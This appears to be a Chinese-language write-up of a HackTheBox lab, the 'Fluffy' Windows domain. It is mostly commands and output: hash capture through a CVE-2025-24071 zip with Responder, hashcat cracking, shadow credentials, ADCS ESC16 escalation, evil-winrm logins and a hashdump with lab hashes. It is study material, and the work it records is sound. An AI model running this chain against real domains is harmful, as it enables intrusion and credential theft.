基本信息

1
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

端口扫描

没有web端口,常规windows域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
$ nmap -sC -sV -Pn 10.10.11.69
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 15:25 JST
Nmap scan report for 10.10.11.69
Host is up (0.18s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-26 13:05:42Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-05-26T13:07:07+00:00; +6h38m55s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-26T13:07:05+00:00; +6h38m55s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-05-26T13:07:07+00:00; +6h38m55s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-26T13:07:05+00:00; +6h38m55s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h38m54s, deviation: 0s, median: 6h38m54s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-26T13:06:25
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.44 seconds

SMB

给出的账号密码尝试访问smb share,可以看到一个IT,里面是两个在用的程序和一个pdf:

Upgrade_Notice.pdf

内容是一些相关漏洞的信息:

CVE-2025-24071 to p.agila

根据pdf信息提示,找到:

制作一个zip上传,得到p.agila访问hash:

1
2
3
4
5
python3 exploit.py -f miao -i 10.10.14.13

sudo python3 Responder.py -i 10.10.14.13 -v

# put exploit.zip

破解出来密码:

1
2
3
sudo hashcat -m 5600 hash.txt ~/Tools/dict/rockyou.txt

prometheusx-303

bloodhound

常规bloodhound收集信息分析

1
bloodhound-python -u p.agila -p 'prometheusx-303' -d 'fluffy.htb' -ns 10.10.11.69 --zip -c All -dc 'dc01.fluffy.htb'

可以看到p.agila对service accounts的GenericAll:

然后该组成员之间互相GenericWrite:

p.agila to winrm_svc

所以就添加自己到该组中,然后利用成员互相之间的GenericWrite

1
2
3
4
5
6
7
8
9
10
11
12
13
faketime "$(curl -sik http://10.10.11.69:5985 | grep -i 'Date: ' | sed s/'Date: '//g)" bash

# 添加自己到SERVICE ACCOUNTS组中
bloodyAD --host 10.10.11.69 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' 'p.agila'

# shadow creds
certipy-ad shadow auto -username p.agila@fluffy.htb -password 'prometheusx-303' -account winrm_svc

[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

# 其他两个用户也一样
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

user flag

Winrm_svc用户winrm登录:

1
evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767

ESC16 to root

这里需要最新的certipy-ad,官方分支已经都合并了:

可以发现ESC16:

1
2
3
4
5
certipy find -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -target fluffy.htb  -stdout -vulnerable

fluffy-DC01-CA
DC01.fluffy.htb
1.3.6.1.4.1.311.25.2

按照wiki一步步,使用前面的p.agila作为attacker,ca_svc作为victim:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bloodyAD --host 10.10.11.69 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' 'p.agila'

# read UPN
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read

# 更改ca_svc的UPN
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -target 'dc01.fluffy.htb' -upn 'administrator' -user 'ca_svc' update

# 请求证书
certipy req -dc-ip 10.10.11.69 -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

# 还原UPN
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -target 'dc01.fluffy.htb' -upn 'ca_svc' -user 'ca_svc' update

# 证书认证
certipy auth -pfx administrator.pfx -username 'administrator' -domain fluffy.htb -dc-ip 10.10.11.69

[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

root flag

Administrator hash登录:

1
evil-winrm -i 10.10.11.69 -u Administrator -H 8da83a3fa618b6e3a00e93f676c92a6e

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c3442d41139f13bd02f0695d56362b9:::
ca_svc:1103:aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8:::
ldap_svc:1104:aad3b435b51404eeaad3b435b51404ee:22151d74ba3de931a352cba1f9393a37:::
p.agila:1601:aad3b435b51404eeaad3b435b51404ee:a51fede5012110e9a65bd3f470513867:::
winrm_svc:1603:aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767:::
j.coffey:1605:aad3b435b51404eeaad3b435b51404ee:dff933046fa0943ac993d35a054235e3:::
j.fleischman:1606:aad3b435b51404eeaad3b435b51404ee:10842ead8d1d060a2de1394e4b2ea460:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7a9950c26fe9c3cbfe5b9ceaa21c9bfd:::
meterpreter >

参考资料